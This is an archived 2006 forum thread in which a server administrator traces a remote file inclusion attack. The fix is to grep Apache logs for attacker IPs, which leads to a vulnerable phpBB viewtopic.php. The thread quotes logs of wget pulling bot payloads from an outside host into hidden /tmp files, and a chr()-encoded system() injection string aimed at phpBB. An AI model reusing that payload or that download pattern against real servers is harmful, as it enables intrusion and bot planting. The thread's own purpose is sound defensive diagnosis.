?
Solved

How do I find a script being used to as a "Remote File Inclusion" exploit on my server?

Posted on 2006-05-01
7
Medium Priority
?
288 Views
Last Modified: 2010-04-22
How do I find a script being used to as a "Remote File Inclusion" exploit on my server? Every few seconds the error log shows an entry like this.


--16:19:54--  http://mobile-portal.info/myfiles/expl/linuxday.txt
  (try:13) => `/tmp/.girl'
Connecting to mobile-portal.info[88.212.221.4]:80... --16:19:56--  http://mobile-portal.info/myfiles/expl/linuxdaybot.txt
  (try:14) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212.221.4]:80... --16:20:04--  http://mobile-portal.info/myfiles/expl/linuxdaybot.txt
  (try:13) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212.221.4]:80... failed: Connection timed out.
Retrying.

failed: Connection timed out.

Obviously my firewall is preventing it from completing its IRC planting mission - which is great - so nothing is actually getting dropped into my /tmp folder while the firewall is up and running but many bots out there are automatically trying my defenses all day and they are all using the same script on my server to access my server but I can't find a trace of what they are using to access it. Either the script is an innocent and exploitable script that belongs to a regular product like a forum or it was planted there by a malicious user.

I have successfully used netstat and grep to determine the IPs of many of the machines that are trying to get in and I have added those IPs to my iptables to stop them but new ones keep showing up so something exploitable is sitting on my server. I have a 1000 websites on this server so I can't just say - "oh its my forum script that needs upgrading" - I need to figure out how to search for a log record somewhere that would have the actual event and file location of the exploit.

I've asked a number of my super Linux tech friends and have come up empty handed so far.

Any ideas? I've been scratching my head for 4 days trying to come up with inventive ways to find the culprit.
0
Comment
Question by:gerrybakker
  • 3
  • 2
6 Comments
 
LVL 15

Expert Comment

by:m1tk4
ID: 16582484
Well if you have the IPs to add to iptables as someone breaking in, why don't you grep all your 1000 apache log files  for these IP addresses and see what files they are accessing?

Also, it's not clear WHAT error log shows this - is this your apache error log or something else?
0
 

Author Comment

by:gerrybakker
ID: 16583263
m1tk4  thanks for the forehead slapping obvious answer - "check the 1000 apache logs". It was staring me in the face but I couldn't see the trees for the forest. It was just too obvious.


After identifying the IP addresses I then did a grep for those IP addresses in the /var/log/httpd/domains folder to find the scripts that were being used.

grep -n -r -I "221.169.150.160" *

The results showed extended character codes in the string to hide the real string. you would never know or find the text string " http://mobile-portal.info/myfiles/expl/linuxdaybot.txt" in this result but it didn't matter because it was definitely the IP address that was running the wget session. Mystery solved.

sample line found in the log with the correct IP address.

mwarriors.com.log:242:221.169.150.160 - - [01/May/2006:08:57:24 -0700] "GET /phpBB2/viewtopic.php?p=194&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 23026 "-" "Mozilla/4.0"
0
 

Author Comment

by:gerrybakker
ID: 16583285
Apparently - in this case it was the viewtopic.php file in phpBB that was being exploited.
0
Veeam Disaster Recovery in Microsoft Azure

Veeam PN for Microsoft Azure is a FREE solution designed to simplify and automate the setup of a DR site in Microsoft Azure using lightweight software-defined networking. It reduces the complexity of VPN deployments and is designed for businesses of ALL sizes.

 
LVL 15

Expert Comment

by:m1tk4
ID: 16585351
>>it was the viewtopic.php file in phpBB

exactly.
0
 
LVL 15

Expert Comment

by:m1tk4
ID: 16747503
And why would it be a refund? I certainly object.
0
 

Accepted Solution

by:
GranMod earned 0 total points
ID: 16778327
PAQed with points refunded (500)

GranMod
Community Support Moderator
0

Featured Post

Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

BIND is the most widely used Name Server. A Name Server is the one that translates a site name to it's IP address. There is a new bug in BIND (https://kb.isc.org/article/AA-01272), affecting all versions of BIND 9 from BIND 9.1.0 (inclusive) thro…
Fine Tune your automatic Updates for Ubuntu / Debian
In a question here at Experts Exchange (https://www.experts-exchange.com/questions/29062564/Adobe-acrobat-reader-DC.html), a member asked how to create a signature in Adobe Acrobat Reader DC (the free Reader product, not the paid, full Acrobat produ…
As many of you are aware about Scanpst.exe utility which is owned by Microsoft itself to repair inaccessible or damaged PST files, but the question is do you really think Scanpst.exe is capable to repair all sorts of PST related corruption issues?
Suggested Courses
Course of the Month16 days, 19 hours left to enroll

864 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question